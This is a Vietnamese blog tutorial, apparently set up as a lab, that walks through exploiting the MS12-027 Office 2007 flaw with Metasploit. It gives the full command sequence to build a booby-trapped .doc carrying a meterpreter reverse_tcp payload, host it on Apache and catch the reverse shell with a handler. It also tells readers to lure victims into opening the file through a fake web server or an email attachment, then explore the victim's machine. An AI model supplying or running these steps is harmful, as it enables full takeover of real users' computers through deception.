Các bạn tham khảo lỗi
này tại:
Nguyên tắc khai thác lỗi
ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn
nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn
có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi
kèm theo mail, …) máy nạn nhân đang sử dụng Microsoft Office 2007
(no-SP/SP1/SP2/SP3) trên Windows (XP SP3 / 7 SP1) English là máy nạn nhân sẽ bị
“nhiễm độc”.
Mô
hình bài Lab
Máy
Hacker:
Hệ điều hành: Sử dụng
Backtrack 5
IP: 192.168.119.132
Máy
nạn nhân:
Hệ điều hành: Sử dụng
Windows XP
IP: 192.168.119.129
Cách khai thác:
Mở Metasploit trên
Backtrack 5 bằng lệnh: msfconsole
Từ dấu nhắc sử dụng lệnh
dưới để search mã lỗi trong msf
msf >
search ms12_027
copy đường dẫn, enter
gõ use “dán đường dẫn vào”
msf >
use exploit/windows/fileformat/ms12_027_mscomctl_bof
Gõ lệnh show options để
thấy những option của lỗi
msf exploit(ms12_027_mscomctl_bof) > show
options
Ở đây ta thấy bắt buộc
phải tạo FILENAME
Lần lượt gõ các lệnh:
msf exploit(ms12_027_mscomctl_bof) > set
filename filemadoc.doc
Ta sẽ thấy có một file
filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích)
msf exploit(ms12_027_mscomctl_bof) > set
payload windows/meterpreter/reverse_tcp
msf exploit(ms12_027_mscomctl_bof) > set LHOST
192.168.119.132
Địa chỉ này là địa chỉ
IP của máy Hacker chính là máy BackTrack.
msf exploit(ms12_027_mscomctl_bof) > exploit
Gõ lệnh exploit để thực
thi
msf exploit(ms12_027_mscomctl_bof) > cp
/root/.msf4/local/filemadoc.doc /root/Desktop
ta copy file
“filemadoc.doc” đã được tạo ra ngoài Desktop cho dễ sử dụng.
Vậy là việc tạo ra file
chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này
là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để
nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc
chạy.
Upload file
“filemadoc.doc” lên Webserver bằng cách đưa nó vào thư mục “/var/www”
Start Webserver ảo bằng
lệnh
root@bt:~#
service apache2 start
* Starting web server apache2 [ OK
]
Tạo ra một trình lắng
nghe
msf exploit(ms12_027_mscomctl_bof) > use
exploit/multi/handler
msf exploit(handler) > set payload
windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
192.168.119.132
msf exploit(handler) > exploit
Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta đã
dựng và tải file “filemadoc.doc” về.
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm
vào.
Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào
máy nạn nhân
Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới
máy 192.168.119.129:1040
Giờ ta có thể khai thác được máy nạn nhân
Gõ getuid để thấy thông tin username, getinfo để biết
thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã
hoàn toàn kiểm xoát được máy nạn nhân.
Thanks!.
Không có nhận xét nào:
Đăng nhận xét